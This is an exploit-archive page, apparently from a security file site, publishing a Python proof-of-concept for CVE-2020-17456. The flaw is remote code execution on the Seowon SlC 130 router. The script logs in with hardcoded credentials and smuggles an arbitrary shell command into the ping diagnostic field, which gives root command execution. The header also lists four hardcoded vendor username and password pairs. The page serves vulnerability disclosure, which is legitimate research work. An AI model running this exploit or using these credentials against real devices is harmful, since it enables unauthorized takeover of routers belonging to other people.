Seowon SlC 130 Router Remote Code Execution

Seowon SlC 130 Router Remote Code Execution: Posted Aug 21, 2020; Authored by Ali Jalalat; Seowon SlC 130 Router suffers from a remote code execution vulnerability.; tags | exploit, remote, code execution; advisories | CVE-2020-17456; SHA-256 | 2c2caed94290b76cf2dcb160e2fa1928c1b317ff58fa6be49af50b2e9dfe1014; Download | Favorite | View

Seowon SlC 130 Router Remote Code Execution

# Exploit Title: Seowon SlC 130 Router - Remote Code Execution
# Author: maj0rmil4d - Ali Jalalat
# Author website: https://secureguy.ir
# Date: 2020-08-20
# Vendor Homepage: seowonintech.co.kr
# Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kind=B05&middle_kind=B05_29
# CVE: CVE-2020-17456
# Version: Lync:Mac firmware 1.0.1, likely earlier versions
# Tested on: Windows 10 - Parrot sec

# Description:
# user can run arbitrary commands on the router as root ! 
# as there are already some hardcoded credentials so there is an easy to trigger exploit

# credentials : 
# user => VIP
# pwd => V!P83869000

# user => Root
# pwd => PWDd0N~WH*4G#DN

# user => root
# pwd => gksrmf28

# user => admin
# pwd => admin
# 

# A  write-up can be found at:
# https://maj0rmil4d.github.io/Seowon-SlC-130-And-SLR-120S-Exploit/

import requests
import sys

host = sys.argv[1]

session = requests.Session()

header = { 

"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q:0.9,image/webp,*/*;q:0.8",
"Accept-Language": "en-US,en;q:0.5",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "pplication/x-www-form-urlencoded",
"Content-Length": "132",
"Origin": "http://192.168.1.1",
"Connection": "close",
"Referer": "http://192.168.1.1/",
"Upgrade-Insecure-Requests": "1"
}



datas = {
  
  "Command":"Submit",
  "expires":"Wed%2C+12+Aug+2020+15%3A20%3A05+GMT",
  "browserTime":"081119502020",
  "currentTime":"1597159205",
  "user":"admin",
  "password":"admin"
}


#auth

session.post(host+"/cgi-bin/login.cgi" , headers=header , data = datas)

#rce

cmd = sys.argv[2]

rce_data = {
  
  "Command":"Diagnostic",
  "traceMode":"ping",
  "reportIpOnly":"",
  "pingIpAddr":";".encode("ISO-8859-1").decode()+cmd,
  "pingPktSize":"56",
  "pingTimeout":"30",
  "pingCount":"4",
  "maxTTLCnt":"30",
  "queriesCnt":"3",
  "reportIpOnlyCheckbox":"on",
  "btnApply":"Apply",
  "T":"1597160664082"
}

rce = session.post(host+"/cgi-bin/system_log.cgi" , headers=header , data = rce_data)

print("one line out put of ur command => " + rce.text.split('!')[1].split('[')[2].split("\n")[0])

Top Authors In Last 30 Days

Red Hat 240 files
indoushka 173 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,123)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,209)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,823)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,848)
UNIX (9,455)
UnixWare (188)
Windows (6,772)
Other

Seowon SlC 130 Router Remote Code Execution

Seowon SlC 130 Router Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Seowon SlC 130 Router Remote Code Execution

Share This

Seowon SlC 130 Router Remote Code Execution

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems